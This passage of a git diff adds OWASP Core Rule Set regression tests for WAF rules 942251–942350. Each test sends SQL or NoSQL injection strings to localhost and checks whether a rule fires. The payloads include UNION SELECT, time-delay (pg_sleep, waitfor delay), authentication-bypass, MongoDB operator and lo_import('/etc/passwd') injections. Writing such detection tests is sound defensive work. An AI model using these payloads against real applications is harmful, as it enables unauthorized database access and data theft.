HTTP/1.0 + data: "javascript:\"/*'/*`/*--> 5'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log_contains: id "942251" + - test_title: 942251-2 + desc: "Detects having injections negative test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=having%20fun" + version: HTTP/1.0 + output: + no_log_contains: id "942251" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml new file mode 100644 index 00000000..0c440ab6 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml @@ -0,0 +1,24 @@ +--- +meta: + author: "Christian S.J. Peron, Christian Folini" + description: None + enabled: true + name: 942260.yaml +tests: + - test_title: 942260-1 + desc: "Basic SQL authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something LIKE ' + uri: "/?var=something%20LIKE%20%27" + version: HTTP/1.0 + output: + log_contains: id "942260" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml new file mode 100644 index 00000000..bf16aaec --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml @@ -0,0 +1,39 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942270.yaml +tests: + - test_title: 942270-1 + desc: "basic sql injection. Common attack string for mysql, oracle and others" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log_contains: id "942270" + - test_title: 942270-2 + desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=Xunionselectfrom" + version: HTTP/1.0 + output: + log_contains: id "942270" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml new file mode 100644 index 00000000..c0f6bff5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -0,0 +1,40 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942280.yaml +tests: + - test_title: 942280-1 + desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log_contains: id "942280" + - test_title: 942280-2 + desc: "SQL Server waitfor delay attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log_contains: id "942280 diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml new file mode 100644 index 00000000..f93a3a09 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml @@ -0,0 +1,155 @@ +--- +meta: + author: csanders-git + description: None + enabled: true + name: 942290.yaml +tests: + - test_title: 942290-1 + desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ + stages: + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: /mongo/show.php?u_id[$ne]=2 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "942290" + - test_title: 942290-2 + desc: "basic MongoDB NOSQL injection attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-3 + desc: "basic MongoDB NOSQL injection attempts 2" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-4 + desc: "basic MongoDB NOSQL injection attempts 3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-5 + desc: "basic MongoDB NOSQL injection attempts 4" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$not": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-6 + desc: "basic MongoDB NOSQL injection attempts 5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$nor": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-7 + desc: "basic MongoDB NOSQL injection attempts 6" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$where": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-8 + desc: "basic MongoDB NOSQL injection attempts 7" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$elemMatch": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-9 + desc: "basic MongoDB NOSQL injection attempts 8" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$text": "foo"}' + output: + log_contains: id "942290" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml new file mode 100644 index 00000000..383c0c4c --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml @@ -0,0 +1,55 @@ +--- +meta: + author: "Christian S.J. Peron, Franziska Bühler" + description: None + enabled: true + name: 942300.yaml +tests: + - test_title: 942300-1 + desc: "MySQL comments, conditions and ch(a)r injectionss" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_title: 942300-2 + desc: "MySQL comments, conditions and ch(a)r injectionss" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=) when 234 then&foo=bar" + version: HTTP/1.0 + output: + log_contains: id "942300" + - test_title: 942300-3 + desc: "No false positives with for. Issue #2007" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=booked%20for%202021%28including%202020" + version: HTTP/1.0 + output: + no_log_contains: id "942300" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml new file mode 100644 index 00000000..17ede052 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml @@ -0,0 +1,63 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942310.yaml +tests: + - test_title: 942310-1 + desc: | + Chained SQL injection attempts 2/2. + This test originally checked the expression `[\"'`]\s+and\s*?=\W`. We opted to remove that expression as it + does not appear to match anything useful (https://github.com/coreruleset/coreruleset/issues/2118). + This test now checks that no match occurs for something that would have matched the original expression. + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%22%27%20and%20%3d%20bar" + version: HTTP/1.0 + output: + no_log_contains: id "942310" + - test_title: 942310-2 + desc: | + Chained SQL injection attempts 2/2. + This test checks for a positive match of `\(\s*?select\s*?\w+\s*?\(`. + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var='%20and%201%20in%20(select%20min(name)%20from%20sysobjects%20where%20xtype%20%3D%20'U'%20and%20name%20%3E%20'.')%20--" + version: HTTP/1.0 + output: + log_contains: id "942310" + - test_title: 942310-3 + desc: | + Chained SQL injection attempts 2/2. + This test checks for a positive match of `order\s+by\s+if\w*?\s*?\(`. + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=order%20by%20if(1%3D1%2C1%2Csleep(1))" + version: HTTP/1.0 + output: + log_contains: id "942310" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml new file mode 100644 index 00000000..bb8be2c8 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml @@ -0,0 +1,218 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen" + description: None + enabled: true + name: 942320.yaml +tests: + - test_title: 942320-1 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=procedure%20analyse%20%28" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-2 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=exec+%28%40%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-3 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=declare+%40b%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-4 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=DECLARE%2F%2A%2A%2F%40x%0A" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-5 + desc: "Detects PostgreSQL data conversion with ::int" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=password::int" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-6 + desc: "Detects PostgreSQL data conversion with ::bool" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-7 + desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-8 + desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-9 + desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-10 + desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-11 + desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-12 + desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::bigint" + version: HTTP/1.0 + output: + log_contains: id "942320" + - test_title: 942320-13 + desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log_contains: id "942320" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml new file mode 100644 index 00000000..ae9973e9 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml @@ -0,0 +1,37 @@ +--- +meta: + author: "Franziska Bühler" + enabled: true + name: 942321.yaml +tests: + - test_title: 942321-1 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16200),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + version: HTTP/1.0 + output: + log_contains: id "942321" + - test_title: 942321-2 + desc: "Detects MySQL and PostgreSQL stored procedure/function injections" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: overlay(password placing $$$$ from 1)::int and id=1 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942321" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml new file mode 100644 index 00000000..6e72d50f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml @@ -0,0 +1,89 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942330.yaml +tests: + - test_title: 942330-1 + desc: "classic SQL injection probings 1/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-2 + desc: "Test first backslash match ([\"'`\x5c]*?)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-3 + desc: "Test second backslash match (\x5cx(?:23|27|3d))" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=\\x23" + version: HTTP/1.0 + output: + log_contains: id "942330" + - test_title: 942330-4 + desc: "Test false positive issue nr. 3205" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" + - test_title: 942330-5 + desc: "Test false positive issue nr. 3205" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=05111222333 andy.surname@somedomain.com" + version: HTTP/1.0 + output: + no_log_contains: id "942330" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml new file mode 100644 index 00000000..18ca873c --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml @@ -0,0 +1,191 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942340.yaml +tests: + - test_title: 942340-1 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-2 + desc: "SQLite authentication bypass with except select" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-3 + desc: "SQLite authentication bypass with except values" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-4 + desc: "true-negative except selecting" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/?var=except%20selecting" + version: HTTP/1.0 + output: + no_log_contains: id "942340" + - test_title: 942340-5 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-6 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-7 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-8 + desc: "basic SQL authentication bypass attempts 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-9 + desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='||true" + version: HTTP/1.0 + output: + log_contains: id "942340" + - test_title: 942340-10 + desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='ortrue" + version: HTTP/1.0 + output: + no_log_contains: id "942340" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml new file mode 100644 index 00000000..c9c78040 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml @@ -0,0 +1,74 @@ +--- +meta: + author: "Christian S.J. Peron, Franziska Bühler" + description: None + enabled: true + name: 942350.yaml +tests: + - test_title: 942350-1 + desc: "MySQL UDF injection and other data/structure manipulation" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log_contains: id "942350" + - test_title: 942350-2 + desc: "Fix for FP reported in GitHub issue 1587" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + no_log_contains: id "942350" + - test_title: 942350-3 + desc: "MySQL create function injection" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 